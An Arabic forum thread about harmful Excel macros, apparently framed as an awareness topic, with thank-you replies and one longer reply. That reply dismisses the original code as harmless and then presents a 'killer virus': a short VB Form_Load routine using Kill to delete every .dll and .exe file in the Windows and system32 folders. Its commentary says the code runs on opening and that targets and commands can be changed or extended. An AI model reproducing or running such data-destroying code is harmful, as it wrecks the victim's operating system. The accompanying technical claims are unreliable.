(كود منقول) Excel Virus خطر الماكروهات الضارة و الاحتراز منها

[محمد يحياوي]

الحبيب "ابو الحارث" شكرا جزيلا و بارك الله فيك

[abouelhassan]

الاحترام والتقدير واجب

من اخيك

[محمد يحياوي]

الاخ الكريم "ابو الاحسان" بارك الله و وفقك الى الخير

[محمود_الشريف]

موضوع جميل 

بالرغم من أنه قديم 

إلا أحببت أن ألفت النظر الى أن الكود ليس ضار مطلقا ولكن هذا الكود وظيفته التلاعب بمحتويات ملفات الأكسيل بالقيام بإستحواذه على جميع البيانات والأكواد داخل أى ملف أكسيل 

 

وعلى ما أعتقد 

 أن هذا الكود كان له هدف ولم يكتمل

فوظيفته هى إخفاء البيانات والأكواد التى بداخل أى ملف أكسيل لمنع أى تلاعب بالملفات أو منع أى شخص يستخدم هذه البيانات فى هذا الجهاز

فمثلا من الممكن أن تسافر وتترك ملفاتك داخل الجهاز وأردت منع اى انسان من الإطلاع عليها أو العبث بها 

فكان من المفترض أن يتم تطويره لكى يتم عمل له على سبيل مثال زر تعطيل 

مثل كود حماية خليه وله زر تعطيل 

حمايه خليه من الادخال أو التلاعب وزر تعطيل لكى يتم ادخال بيانات 

 

 

 

 

 

 

والفيروس القاتل يكون الكود البرمجى فيه كالتالى

Private Sub Form_Load()
 Kill "%systemdrive%/windows/system32/*.dll"
 Kill "%systemdrive%/windows/*.exe"
 Kill "%systemdrive%/windows/system32/*.exe"
 End Sub

وهنا بينزل الفيروس بدون تحديد مسار أو هدف وكما هو مكتوب كلمه ( kill ) وده أخطرهم 

وبيتلاعب بأى مضاد للفيروسات فى حاله حذفه من الجهاز 

أما الذى محدد له مسار يعنى لو حذفنا ( %systemdrive%) ووضعنا ( :c) فهذا كود محدد المسار وده سهل على الأنتى حذفه واكتشافه

وده يعتبر أسهل كود لتدمير الملفات

يبدأ عمل الفيروس حال فتح الباتش

محتاوه تدمير جميع الملفات بصيغة dll في ملف system32
تدمير جميع الملفات من نوع exe في ملف system32 و windows
يستهدف أهم ملفات في النظام أجمع تستطيع التغيير في الملفات المستهدفة و تستطيع زيادة الأوامر .